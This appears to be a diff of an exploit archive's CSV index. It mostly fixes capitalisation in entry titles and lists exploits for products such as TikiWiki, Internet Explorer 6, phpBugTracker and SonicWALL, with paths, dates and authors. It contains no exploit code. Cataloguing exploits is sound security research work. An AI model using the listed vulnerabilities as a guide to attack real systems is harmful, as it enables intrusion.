-23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 - tiki-list_file_gallery.php galleryId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 - tiki-upload_file.php galleryId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 - tiki-list_file_gallery.php galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 - tiki-upload_file.php galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23961,platforms/php/webapps/23961.txt,"TikiWiki Project 1.8 - tiki-view_faq.php faqId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23962,platforms/php/webapps/23962.txt,"TikiWiki Project 1.8 - tiki-view_chart.php chartId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 - tiki-usermenu.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 @@ -21166,8 +21167,8 @@ id,file,description,date,author,platform,type,port 23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 - tiki-directory_ranking.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23967,platforms/php/webapps/23967.txt,"E Sms Script - Multiple SQL Injections",2013-01-08,"cr4wl3r ",php,webapps,0 -23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software - Persistence Cross-Site Scripting",2013-01-08,"SecPod Research",asp,webapps,0 -23970,platforms/php/webapps/23970.rb,"Wordpress Plugin Google Document Embedder - Arbitrary File Disclosure",2013-01-08,Metasploit,php,webapps,0 +23968,platforms/asp/webapps/23968.txt,"Advantech Webaccess HMI/SCADA Software - Persistence Cross-Site Scripting",2013-01-08,"SecPod Research",asp,webapps,0 +23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure",2013-01-08,Metasploit,php,webapps,0 23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 - tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 @@ -21181,9 +21182,9 @@ id,file,description,date,author,platform,type,port 23982,platforms/php/webapps/23982.txt,"TikiWiki Project 1.8 - tiki-list_faqs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 - tiki-list_trackers.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 - tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23986,platforms/cgi/webapps/23986.txt,"Blackboard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,"DarC KonQuest",cgi,webapps,0 +23986,platforms/cgi/webapps/23986.txt,"BlackBoard Learning System 5.x/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,"DarC KonQuest",cgi,webapps,0 23987,platforms/cgi/remote/23987.txt,"SurgeLDAP 1.0 - User.cgi Directory Traversal",2004-04-12,dr_insane,cgi,remote,0 -23988,platforms/php/webapps/23988.txt,"Nuked-Klan 1.x - Multiple Vulnerabilities",2004-04-12,frog,php,webapps,0 +23988,platforms/php/webapps/23988.txt,"Nuked-klaN 1.x - Multiple Vulnerabilities",2004-04-12,frog,php,webapps,0 23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation",2004-04-18,mslug@safechina.net,windows,local,0 23990,platforms/php/webapps/23990.txt,"PHP-Nuke 6.x/7.x - CookieDecode Cross-Site Scripting",2004-04-13,waraxe,php,webapps,0 23991,platforms/php/webapps/23991.txt,"Tutos 1.1.20031017 - note_overview.php id Parameter SQL Injection",2004-04-13,"François SORIN",php,webapps,0 @@ -21197,11 +21198,11 @@ id,file,description,date,author,platform,type,port 23997,platforms/php/webapps/23997.txt,"WeBid 1.0.6 - SQL Injection",2013-01-09,"Life Wasted",php,webapps,0 24001,platforms/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 - Cross-Site Scripting",2004-04-14,"Noam Rathaus",cgi,webapps,0 24002,platforms/windows/dos/24002.py,"Microsoft Outlook Express 6.0 - Remote Denial of Service",2004-04-14,"Ben Rampling",windows,dos,0 -24003,platforms/php/webapps/24003.txt,"PHPBugTracker 0.9 - query.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 -24004,platforms/php/webapps/24004.txt,"PHPBugTracker 0.9 - bug.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 -24005,platforms/php/webapps/24005.txt,"PHPBugTracker 0.9 - bug.php Multiple Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 -24006,platforms/php/webapps/24006.txt,"PHPBugTracker 0.9 - query.php Multiple Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 -24007,platforms/php/webapps/24007.txt,"PHPBugTracker 0.9 - user.php bugid Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 +24003,platforms/php/webapps/24003.txt,"phpBugTracker 0.9 - query.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 +24004,platforms/php/webapps/24004.txt,"phpBugTracker 0.9 - bug.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 +24005,platforms/php/webapps/24005.txt,"phpBugTracker 0.9 - bug.php Multiple Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 +24006,platforms/php/webapps/24006.txt,"phpBugTracker 0.9 - query.php Multiple Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 +24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 - user.php bugid Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x - Email Attachment Script Injection",2004-04-15,"spiffomatic 64",php,webapps,0 24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 - affich.php Remote File Inclusion Command Injection",2004-04-15,jaguar,php,webapps,0 24010,platforms/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service",2004-04-15,anonymous,windows,dos,0 @@ -21241,7 +21242,7 @@ id,file,description,date,author,platform,type,port 24044,platforms/php/webapps/24044.txt,"PHPLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure",2004-04-23,CyberTalon,asp,webapps,0 -24050,platforms/php/webapps/24050.txt,"Advanced GuestBook 2.2 - Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 +24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 - Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 24052,platforms/php/webapps/24052.txt,"OpenBB 1.0.x - member.php redirect Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 24053,platforms/php/webapps/24053.txt,"OpenBB 1.0.x - myhome.php to Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 @@ -21260,7 +21261,7 @@ id,file,description,date,author,platform,type,port 24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",multiple,dos,0 24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote,0 24068,platforms/php/webapps/24068.txt,"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting",2004-04-30,"Alvin Alex",php,webapps,0 -24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6.0 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0 +24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0 24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos,0 24071,platforms/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",php,webapps,0 24072,platforms/php/webapps/24072.txt,"Coppermine Photo Gallery 1.x - menu.inc.php CPG_URL Parameter Cross-Site Scripting",2004-04-30,"Janek Vind",php,webapps,0 @@ -21276,7 +21277,7 @@ id,file,description,date,author,platform,type,port 24082,platforms/php/webapps/24082.txt,"Simple Machines Forum 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 24084,platforms/multiple/remote/24084.py,"Nagios - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0 -24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 +24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go Parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps,0 24088,platforms/php/webapps/24088.txt,"PHPX 3.x - admin/page.php Cross-Site Request Forgery Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24089,platforms/php/webapps/24089.txt,"PHPX 3.x - admin/news.php Cross-Site Request Forgery Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 @@ -21301,16 +21302,16 @@ id,file,description,date,author,platform,type,port 24108,platforms/php/webapps/24108.txt,"CMS phpshop 2.0 - SQL Injection",2013-01-14,"By onestree",php,webapps,0 24110,platforms/windows/dos/24110.py,"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service",2013-01-14,"Julien Ahrens",windows,dos,0 24111,platforms/windows/dos/24111.py,"Serva 2.0.0 - HTTP Server GET Remote Denial of Service",2013-01-14,"Julien Ahrens",windows,dos,0 -24112,platforms/windows/dos/24112.txt,"Microsoft Internet Explorer 6.0 - XML Parsing Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 +24112,platforms/windows/dos/24112.txt,"Microsoft Internet Explorer 6 - XML Parsing Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",windows,dos,0 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local,0 24114,platforms/windows/remote/24114.html,"Microsoft Outlook 2003 - Mail Client E-mail Address Verification",2004-05-11,http-equiv,windows,remote,0 24115,platforms/hardware/remote/24115.c,"Multiple Linksys Devices - DHCP Information Disclosure",2004-05-31,"Jon Hart",hardware,remote,0 24116,platforms/windows/remote/24116.txt,"Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification",2004-05-13,"Karol Wiesek",windows,remote,0 -24117,platforms/windows/remote/24117.txt,"Microsoft Internet Explorer 6.0 - Codebase Double Backslash Local Zone File Execution",2003-11-25,"Liu Die Yu",windows,remote,0 +24117,platforms/windows/remote/24117.txt,"Microsoft Internet Explorer 6 - Codebase Double Backslash Local Zone File Execution",2003-11-25,"Liu Die Yu",windows,remote,0 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 - URI Obfuscation",2004-05-13,http-equiv,windows,remote,0 24119,platforms/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 - http-equiv Meta Tag Denial of Service",2004-05-14,"Mike Mauler",windows,dos,0 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 -24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 +24121,platforms/osx/remote/24121.txt,"Apple Mac OS X 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0 24124,platforms/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps,0 @@ -21318,7 +21319,7 @@ id,file,description,date,author,platform,type,port 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps,0 24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Include",2004-05-17,waraxe,php,webapps,0 24128,platforms/windows/dos/24128.txt,"ActivePerl 5.x / Cygwin 1.5.x - System Function Call Buffer Overflow",2004-05-18,"Oliver Karow",windows,dos,0 -24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPD 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 +24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x / Larry Wall Perl 5.x - Duplication Operator Integer Overflow",2004-05-18,"Matt Murphy",multiple,dos,0 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps,0 24133,platforms/windows/remote/24133.rb,"Freesshd - Authentication Bypass",2013-01-15,Metasploit,windows,remote,0 @@ -21330,7 +21331,7 @@ id,file,description,date,author,platform,type,port 24139,platforms/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-05-22,"Sandeep Giri",jsp,webapps,0 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0 24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0 -24142,platforms/windows/dos/24142.pl,"MollenSoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos,0 +24142,platforms/windows/dos/24142.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos,0 24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0 24144,platforms/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",windows,dos,0 24145,platforms/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (1)",2004-05-25,badpack3t,windows,dos,0 @@ -21338,14 +21339,14 @@ id,file,description,date,author,platform,type,port 24147,platforms/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (3)",2004-06-02,CoolICE,windows,dos,0 24148,platforms/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",multiple,remote,0 24149,platforms/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,php,remote,0 -24150,platforms/windows/dos/24150.pl,"MollenSoft Lightweight FTP Server 3.6 - Remote Buffer Overflow",2004-05-28,"Chintan Trivedi",windows,dos,0 +24150,platforms/windows/dos/24150.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Buffer Overflow",2004-05-28,"Chintan Trivedi",windows,dos,0 24151,platforms/php/webapps/24151.txt,"JPortal 2.2.1 - print.php SQL Injection",2004-05-28,"Maciek Wierciski",php,webapps,0 24152,platforms/php/webapps/24152.txt,"Land Down Under - BBCode HTML Injection",2004-05-29,"Tim De Gier",php,webapps,0 24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 - usersettings.php avmsg Parameter Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0 24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0 24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 - SSI.php SQL Injection",2004-06-11,JvdR,php,webapps,0 -24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6.0 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,windows,remote,0 -24188,platforms/cgi/webapps/24188.pl,"Blackboard Learning System 6.0 - Dropbox File Download",2004-06-10,"Maarten Verbeek",cgi,webapps,0 +24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,windows,remote,0 +24188,platforms/cgi/webapps/24188.pl,"BlackBoard Learning System 6.0 - Dropbox File Download",2004-06-10,"Maarten Verbeek",cgi,webapps,0 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,multiple,remote,0 24157,platforms/php/webapps/24157.txt,"Cydia Repo Manager - Cross-Site Request Forgery",2013-01-16,"Ramdan Yantu",php,webapps,0 24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework - Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 @@ -21363,11 +21364,11 @@ id,file,description,date,author,platform,type,port 24170,platforms/multiple/dos/24170.txt,"Colin McRae Rally 2004 - Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",multiple,dos,0 24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0 24172,platforms/php/webapps/24172.txt,"cPanel 5-9 - Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",php,webapps,0 -24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape Functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0 -24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6.0 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0 +24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0 +24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0 24175,platforms/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 - Next_file Parameter File Disclosure",2004-06-07,"John Doe",cgi,webapps,0 -24176,platforms/php/webapps/24176.txt,"NetWin SurgeMail 1.8/1.9/2.0 / WebMail 3.1 - Error Message Full Path Disclosure",2004-06-07,"Donnie Werner",php,webapps,0 -24177,platforms/php/webapps/24177.txt,"NetWin SurgeMail 1.8/1.9/2.0 / WebMail 3.1 - Login Form Cross-Site Scripting",2004-06-07,"Donnie Werner",php,webapps,0 +24176,platforms/php/webapps/24176.txt,"NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Error Message Full Path Disclosure",2004-06-07,"Donnie Werner",php,webapps,0 +24177,platforms/php/webapps/24177.txt,"NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Login Form Cross-Site Scripting",2004-06-07,"Donnie Werner",php,webapps,0 24178,platforms/windows/dos/24178.txt,"ToCA Race Driver - Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",windows,dos,0 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0 24180,platforms/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 @@ -21391,14 +21392,14 @@ id,file,description,date,author,platform,type,port 24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 -24205,platforms/linux/remote/24205.txt,"Novell NCP - Pre-Authenticated Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 +24205,platforms/linux/remote/24205.txt,"Novell NCP - Pre-Authentication Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote,0 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 24208,platforms/windows/dos/24208.c,"FreeIPS 1.0 Protected Service - Denial of Service",2004-06-14,shawnwebb@softhome.net,windows,dos,0 24209,platforms/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service",2004-06-14,"Tan Chew Keong",windows,dos,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0 -24211,platforms/windows/dos/24211.txt,"Microsoft Internet Explorer 6.0 - HREF Save As Denial of Service",2004-06-15,"Rafel Ivgi The-Insider",windows,dos,0 +24211,platforms/windows/dos/24211.txt,"Microsoft Internet Explorer 6 - HREF Save As Denial of Service",2004-06-15,"Rafel Ivgi The-Insider",windows,dos,0 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.php File Include",2004-06-15,loofus,php,webapps,0 24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 - Wildcard DNS Cross-Site Scripting",2004-06-15,"bitlance winter",windows,remote,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0 @@ -21416,12 +21417,12 @@ id,file,description,date,author,platform,type,port 24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+ / DI-624 / DI-704 - DHCP Log HTML Injection",2004-06-21,c3rb3r,hardware,remote,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps,0 24228,platforms/php/webapps/24228.txt,"Joomla com_collector Component - Arbitrary File Upload",2013-01-19,"Red Dragon_al",php,webapps,0 -24229,platforms/php/webapps/24229.txt,"Wordpress Plugin Ripe HD FLV Player - SQL Injection",2013-01-19,Zikou-16,php,webapps,0 +24229,platforms/php/webapps/24229.txt,"WordPress Plugin Ripe HD FLV Player - SQL Injection",2013-01-19,Zikou-16,php,webapps,0 24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting",2004-06-22,"Josh Gilmour",php,webapps,0 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service",2004-06-23,"Marceta Milos",freebsd,dos,0 24234,platforms/php/webapps/24234.html,"vBulletin 3.0.1 - newreply.php WYSIWYG_HTML Parameter Cross-Site Scripting",2004-06-24,"Cheng Peng Su",php,webapps,0 -24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions Newsletter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps,0 +24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps,0 24236,platforms/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script - Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",cgi,webapps,0 24237,platforms/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script - Full Path Disclosure",2004-06-28,DarkBicho,cgi,webapps,0 24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - example1.php id Parameter Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0 @@ -21434,28 +21435,28 @@ id,file,description,date,author,platform,type,port 24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0 24246,platforms/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",multiple,remote,0 24247,platforms/multiple/dos/24247.txt,"Easy Chat Server 1.x - Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",multiple,dos,0 -24248,platforms/unix/dos/24248.txt,"IBM WebSphere Caching Proxy Server 5.0 2 - Denial of Service",2004-07-02,"Leandro Meiners",unix,dos,0 -24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6.0 - Shell.Application Object Script Execution",2004-07-03,http-equiv,windows,remote,0 +24248,platforms/unix/dos/24248.txt,"IBM Websphere Caching Proxy Server 5.0 2 - Denial of Service",2004-07-02,"Leandro Meiners",unix,dos,0 +24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6 - Shell.Application Object Script Execution",2004-07-03,http-equiv,windows,remote,0 24250,platforms/multiple/remote/24250.pl,"MySQL 4.1/5.0 - Authentication Bypass",2004-07-05,"Eli Kara",multiple,remote,0 -24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0 +24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0 24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting",2004-07-05,"Donato Ferrante",multiple,remote,0 24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 - Email Header HTML Injection",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 - 'index.php' gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 -24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 +24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 - Cookie manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 24257,platforms/php/webapps/24257.txt,"JAWS 0.2/0.3 - 'index.php' action Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0 24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple Unspecified iSNS / SMB / SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 -24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 +24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 